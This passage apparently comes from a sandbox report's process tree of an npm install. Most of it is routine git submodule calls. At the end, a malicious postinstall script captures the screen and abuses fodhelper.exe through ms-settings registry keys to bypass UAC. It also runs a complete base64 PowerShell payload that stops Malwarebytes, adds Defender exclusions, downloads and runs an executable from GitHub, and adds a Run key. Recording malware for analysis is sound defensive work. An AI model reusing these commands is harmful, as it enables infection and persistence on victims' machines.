        "C:\Program Files\Git\usr\bin\sed.exe" -e "s/-/ /"
        9⤵
        
        PID:768
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:4776
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:3760
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:6120
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        9⤵
        
        PID:1288
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" sh-i18n--envsubst --variables "usage: $dashless $USAGE"
        10⤵
        
        PID:1448
        
        C:\Program Files\Git\mingw64\libexec\git-core\git-sh-i18n--envsubst.exe
        
        git-sh-i18n--envsubst --variables "usage: $dashless $USAGE"
        11⤵
        
        PID:3384
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" sh-i18n--envsubst "usage: $dashless $USAGE"
        9⤵
        
        PID:1660
        
        C:\Program Files\Git\mingw64\libexec\git-core\git-sh-i18n--envsubst.exe
        
        git-sh-i18n--envsubst "usage: $dashless $USAGE"
        10⤵
        
        PID:4232
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:4492
        
        C:\Program Files\Git\usr\bin\uname.exe
        
        "C:\Program Files\Git\usr\bin\uname.exe" -s
        8⤵
        
        PID:4184
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:5076
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" rev-parse --git-dir
        8⤵
        
        PID:2940
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:1824
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:952
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" rev-parse --git-path objects
        8⤵
        
        PID:1908
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:3484
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:5180
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" rev-parse --is-inside-work-tree
        9⤵
        
        PID:6064
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:2164
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" rev-parse --show-prefix
        8⤵
        
        PID:1544
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:1256
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" rev-parse --show-toplevel
        8⤵
        
        PID:960
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:720
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:5548
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:2784
        
        C:\Program Files\Git\usr\bin\sed.exe
        
        "C:\Program Files\Git\usr\bin\sed.exe" -e s/-/_/g
        9⤵
        
        PID:3604
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:3856
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" submodule--helper update --recursive --require-init --single-branch --
        8⤵
        
        PID:5188
- - C:\Program Files\Git\cmd\git.exe
    git --no-replace-objects clone https://github.com/robloxopensrc/rbx-reader-ts.git C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\git-clonei7yg47 --recurse-submodules --depth=1 --config core.longpaths=true
    3⤵
    PID:4556
  - - C:\Program Files\Git\mingw64\bin\git.exe
      git.exe --no-replace-objects clone https://github.com/robloxopensrc/rbx-reader-ts.git C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\git-clonei7yg47 --recurse-submodules --depth=1 --config core.longpaths=true
      4⤵
      PID:404
    - - C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        git remote-https origin https://github.com/robloxopensrc/rbx-reader-ts.git
        5⤵
        
        PID:1164
      - C:\Program Files\Git\mingw64\libexec\git-core\git-remote-https.exe
        
        git-remote-https origin https://github.com/robloxopensrc/rbx-reader-ts.git
        6⤵
        
        PID:5292
    - - C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        git --shallow-file C:/Users/Admin/AppData/Local/npm-cache/_cacache/tmp/git-clonei7yg47/.git/shallow.lock index-pack --stdin --fix-thin "--keep=fetch-pack 404 on Ozysbzxk"
        5⤵
        
        PID:3140
    - - C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        git rev-list --objects --stdin --not --all --quiet --alternate-refs
        5⤵
        
        PID:5232
    - - C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        git submodule update --require-init --recursive --single-branch
        5⤵
        
        PID:1048
      - C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        6⤵
        
        PID:2428
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:1384
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:1184
        
        C:\Program Files\Git\usr\bin\basename.exe
        
        "C:\Program Files\Git\usr\bin\basename.exe" "C:/Program Files/Git/mingw64/libexec/git-core\git-submodule"
        9⤵
        
        PID:492
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:2792
        
        C:\Program Files\Git\usr\bin\sed.exe
        
        "C:\Program Files\Git\usr\bin\sed.exe" -e "s/-/ /"
        9⤵
        
        PID:3764
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:5384
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" --exec-path
        8⤵
        
        PID:1816
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:6136
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:3132
        
        C:\Program Files\Git\usr\bin\basename.exe
        
        "C:\Program Files\Git\usr\bin\basename.exe" -- "C:/Program Files/Git/mingw64/libexec/git-core\git-submodule"
        9⤵
        
        PID:2512
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:3320
        
        C:\Program Files\Git\usr\bin\sed.exe
        
        "C:\Program Files\Git\usr\bin\sed.exe" -e "s/-/ /"
        9⤵
        
        PID:1004
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:4816
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:5564
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:3408
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        9⤵
        
        PID:1100
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" sh-i18n--envsubst --variables "usage: $dashless $USAGE"
        10⤵
        
        PID:5520
        
        C:\Program Files\Git\mingw64\libexec\git-core\git-sh-i18n--envsubst.exe
        
        git-sh-i18n--envsubst --variables "usage: $dashless $USAGE"
        11⤵
        
        PID:2908
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" sh-i18n--envsubst "usage: $dashless $USAGE"
        9⤵
        
        PID:4492
        
        C:\Program Files\Git\mingw64\libexec\git-core\git-sh-i18n--envsubst.exe
        
        git-sh-i18n--envsubst "usage: $dashless $USAGE"
        10⤵
        
        PID:2576
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:4092
        
        C:\Program Files\Git\usr\bin\uname.exe
        
        "C:\Program Files\Git\usr\bin\uname.exe" -s
        8⤵
        
        PID:5704
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:1060
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" rev-parse --git-dir
        8⤵
        
        PID:5848
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:2164
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:648
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" rev-parse --git-path objects
        8⤵
        
        PID:4540
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:4908
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:484
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" rev-parse --is-inside-work-tree
        9⤵
        
        PID:3060
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:720
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" rev-parse --show-prefix
        8⤵
        
        PID:1200
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:2016
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" rev-parse --show-toplevel
        8⤵
        
        PID:1436
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:5916
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:5000
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:1452
        
        C:\Program Files\Git\usr\bin\sed.exe
        
        "C:\Program Files\Git\usr\bin\sed.exe" -e s/-/_/g
        9⤵
        
        PID:5960
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:3428
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" submodule--helper update --recursive --require-init --single-branch --
        8⤵
        
        PID:4944
- - C:\Program Files\nodejs\node.exe
    "C:\Program Files\nodejs\node.exe" "C:\Program Files\nodejs\node_modules\npm\bin\npm-cli.js" install --force --cache=C:\Users\Admin\AppData\Local\npm-cache --prefer-offline=false --prefer-online=false --offline=false --no-progress --no-save --no-audit --include=dev --include=peer --include=optional --no-package-lock-only --no-dry-run
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c exit 0
      4⤵
      PID:4784
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c node postinstall
      4⤵
      PID:3916
    - - C:\Program Files\nodejs\node.exe
        
        node postinstall
        5⤵
        
        PID:3088
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\Admin\AppData\screenshot.png" "
        6⤵
        
        PID:2828
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\Admin\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1716
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD502.tmp" "c:\Users\Admin\AppData\Local\Temp\screenCapture\CSCC33F6124CEBA4565B2D5529AF192626.TMP"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3864
        
        C:\Users\Admin\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe
        
        screenCapture_1.3.2.exe "C:\Users\Admin\AppData\screenshot.png"
        7⤵
        
        PID:1148
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\j5xykow0vq4htf1xe8ko\Shell\open\command" /f"
        6⤵
        
        PID:4440
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\j5xykow0vq4htf1xe8ko\Shell\open\command" /f
        7⤵
        Modifies registry class
        
        PID:5624
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\j5xykow0vq4htf1xe8ko\Shell\open\command" /ve /t REG_SZ /d "C:\WindowsApi\52e8692e75c631390adc1f931d431f808cde0d53.exe" /f"
        6⤵
        
        PID:5092
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\j5xykow0vq4htf1xe8ko\Shell\open\command" /ve /t REG_SZ /d "C:\WindowsApi\52e8692e75c631390adc1f931d431f808cde0d53.exe" /f
        7⤵
        Modifies registry class
        
        PID:2300
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /f"
        6⤵
        
        PID:2736
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /f
        7⤵
        Modifies registry class
        
        PID:2032
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "C:\WindowsApi\52e8692e75c631390adc1f931d431f808cde0d53.exe /c powershell -Command \"$b64 = 'JHBzV2luZG93PShHZXQtUHJvY2VzcyAtSWQgJFBJRCkuTWFpbldpbmRvd0hhbmRsZTtBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTt1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7cHVibGljIGNsYXNzIFdpbkFQSXtbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBTaG93V2luZG93KEludFB0ciBoV25kLGludCBuQ21kU2hvdyk7fTsnO1tXaW5BUEldOjpTaG93V2luZG93KCRwc1dpbmRvdyw2KTtpZihHZXQtU2VydmljZSBNQkFNU2VydmljZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZXxXaGVyZS1PYmplY3R7JF8uU3RhdHVzLWVxJ1J1bm5pbmcnfSl7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFByb2dyYW0gRmlsZXNcTWFsd2FyZWJ5dGVzXEFudGktTWFsd2FyZVxtYWx3YXJlYnl0ZXNhc3Npc3RhbnQuZXhlIiAtQXJndW1lbnRMaXN0ICItLXN0b3BzZXJ2aWNlIn07R2V0LUNpbUluc3RhbmNlIC1DbGFzc05hbWUgV2luMzJfTG9naWNhbERpc2t8V2hlcmUtT2JqZWN0eyRfLkRyaXZlVHlwZS1lcSAzfXxGb3JFYWNoLU9iamVjdHtBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICgkXy5EZXZpY2VJRC5UcmltKCkrIlwiKX07JHU9Imh0dHBzOi8vZ2l0aHViLmNvbS9taWNoZWFsamFtZXM5Ni9yb2JJb3gtY2RuL3Jhdy9yZWZzL2hlYWRzL21haW4vT25lZHJpdmUuZXhlIjskcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdSAtT3V0RmlsZSAkcCAtVXNlQmFzaWNQYXJzaW5nO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRwIC1WZXJiIFJ1bkFzOyRzdGFydHVwS2V5PSJIS0NVOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4iO1NldC1JdGVtUHJvcGVydHkgLVBhdGggJHN0YXJ0dXBLZXkgLU5hbWUgIk9uZWRyaXZlIiAtVmFsdWUgJHAgLUZvcmNl'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded\"" /f"
        6⤵
        
        PID:816
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "C:\WindowsApi\52e8692e75c631390adc1f931d431f808cde0d53.exe /c powershell -Command \"$b64 = 'JHBzV2luZG93PShHZXQtUHJvY2VzcyAtSWQgJFBJRCkuTWFpbldpbmRvd0hhbmRsZTtBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTt1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7cHVibGljIGNsYXNzIFdpbkFQSXtbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBTaG93V2luZG93KEludFB0ciBoV25kLGludCBuQ21kU2hvdyk7fTsnO1tXaW5BUEldOjpTaG93V2luZG93KCRwc1dpbmRvdyw2KTtpZihHZXQtU2VydmljZSBNQkFNU2VydmljZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZXxXaGVyZS1PYmplY3R7JF8uU3RhdHVzLWVxJ1J1bm5pbmcnfSl7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFByb2dyYW0gRmlsZXNcTWFsd2FyZWJ5dGVzXEFudGktTWFsd2FyZVxtYWx3YXJlYnl0ZXNhc3Npc3RhbnQuZXhlIiAtQXJndW1lbnRMaXN0ICItLXN0b3BzZXJ2aWNlIn07R2V0LUNpbUluc3RhbmNlIC1DbGFzc05hbWUgV2luMzJfTG9naWNhbERpc2t8V2hlcmUtT2JqZWN0eyRfLkRyaXZlVHlwZS1lcSAzfXxGb3JFYWNoLU9iamVjdHtBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICgkXy5EZXZpY2VJRC5UcmltKCkrIlwiKX07JHU9Imh0dHBzOi8vZ2l0aHViLmNvbS9taWNoZWFsamFtZXM5Ni9yb2JJb3gtY2RuL3Jhdy9yZWZzL2hlYWRzL21haW4vT25lZHJpdmUuZXhlIjskcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdSAtT3V0RmlsZSAkcCAtVXNlQmFzaWNQYXJzaW5nO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRwIC1WZXJiIFJ1bkFzOyRzdGFydHVwS2V5PSJIS0NVOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4iO1NldC1JdGVtUHJvcGVydHkgLVBhdGggJHN0YXJ0dXBLZXkgLU5hbWUgIk9uZWRyaXZlIiAtVmFsdWUgJHAgLUZvcmNl'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded\"" /f
        7⤵
        Modifies registry class
        
        PID:3804
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f"
        6⤵
        
        PID:3388
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        7⤵
        Modifies registry class
        
        PID:5740
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /d /s /c "start "" "C:\Windows\System32\fodhelper.exe""
        6⤵
        
        PID:3784
        
        C:\Windows\System32\fodhelper.exe
        
        "C:\Windows\System32\fodhelper.exe"
        7⤵
        
        PID:2076
        
        C:\WindowsApi\52e8692e75c631390adc1f931d431f808cde0d53.exe
        
        "C:\WindowsApi\52e8692e75c631390adc1f931d431f808cde0d53.exe" /c powershell -Command "$b64 = 'JHBzV2luZG93PShHZXQtUHJvY2VzcyAtSWQgJFBJRCkuTWFpbldpbmRvd0hhbmRsZTtBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTt1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7cHVibGljIGNsYXNzIFdpbkFQSXtbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBTaG93V2luZG93KEludFB0ciBoV25kLGludCBuQ21kU2hvdyk7fTsnO1tXaW5BUEldOjpTaG93V2luZG93KCRwc1dpbmRvdyw2KTtpZihHZXQtU2VydmljZSBNQkFNU2VydmljZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZXxXaGVyZS1PYmplY3R7JF8uU3RhdHVzLWVxJ1J1bm5pbmcnfSl7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFByb2dyYW0gRmlsZXNcTWFsd2FyZWJ5dGVzXEFudGktTWFsd2FyZVxtYWx3YXJlYnl0ZXNhc3Npc3RhbnQuZXhlIiAtQXJndW1lbnRMaXN0ICItLXN0b3BzZXJ2aWNlIn07R2V0LUNpbUluc3RhbmNlIC1DbGFzc05hbWUgV2luMzJfTG9naWNhbERpc2t8V2hlcmUtT2JqZWN0eyRfLkRyaXZlVHlwZS1lcSAzfXxGb3JFYWNoLU9iamVjdHtBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICgkXy5EZXZpY2VJRC5UcmltKCkrIlwiKX07JHU9Imh0dHBzOi8vZ2l0aHViLmNvbS9taWNoZWFsamFtZXM5Ni9yb2JJb3gtY2RuL3Jhdy9yZWZzL2hlYWRzL21haW4vT25lZHJpdmUuZXhlIjskcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdSAtT3V0RmlsZSAkcCAtVXNlQmFzaWNQYXJzaW5nO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRwIC1WZXJiIFJ1bkFzOyRzdGFydHVwS2V5PSJIS0NVOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4iO1NldC1JdGVtUHJvcGVydHkgLVBhdGggJHN0YXJ0dXBLZXkgLU5hbWUgIk9uZWRyaXZlIiAtVmFsdWUgJHAgLUZvcmNl'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded"
        8⤵
        
        PID:1416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$b64 = 'JHBzV2luZG93PShHZXQtUHJvY2VzcyAtSWQgJFBJRCkuTWFpbldpbmRvd0hhbmRsZTtBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTt1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7cHVibGljIGNsYXNzIFdpbkFQSXtbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBTaG93V2luZG93KEludFB0ciBoV25kLGludCBuQ21kU2hvdyk7fTsnO1tXaW5BUEldOjpTaG93V2luZG93KCRwc1dpbmRvdyw2KTtpZihHZXQtU2VydmljZSBNQkFNU2VydmljZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZXxXaGVyZS1PYmplY3R7JF8uU3RhdHVzLWVxJ1J1bm5pbmcnfSl7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFByb2dyYW0gRmlsZXNcTWFsd2FyZWJ5dGVzXEFudGktTWFsd2FyZVxtYWx3YXJlYnl0ZXNhc3Npc3RhbnQuZXhlIiAtQXJndW1lbnRMaXN0ICItLXN0b3BzZXJ2aWNlIn07R2V0LUNpbUluc3RhbmNlIC1DbGFzc05hbWUgV2luMzJfTG9naWNhbERpc2t8V2hlcmUtT2JqZWN0eyRfLkRyaXZlVHlwZS1lcSAzfXxGb3JFYWNoLU9iamVjdHtBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICgkXy5EZXZpY2VJRC5UcmltKCkrIlwiKX07JHU9Imh0dHBzOi8vZ2l0aHViLmNvbS9taWNoZWFsamFtZXM5Ni9yb2JJb3gtY2RuL3Jhdy9yZWZzL2hlYWRzL21haW4vT25lZHJpdmUuZXhlIjskcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdSAtT3V0RmlsZSAkcCAtVXNlQmFzaWNQYXJzaW5nO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRwIC1WZXJiIFJ1bkFzOyRzdGFydHVwS2V5PSJIS0NVOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4iO1NldC1JdGVtUHJvcGVydHkgLVBhdGggJHN0YXJ0dXBLZXkgLU5hbWUgIk9uZWRyaXZlIiAtVmFsdWUgJHAgLUZvcmNl'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded"
        9⤵
        Blocklisted process makes network request
        Adds Run key to start application
        Command and Scripting Interpreter: PowerShell
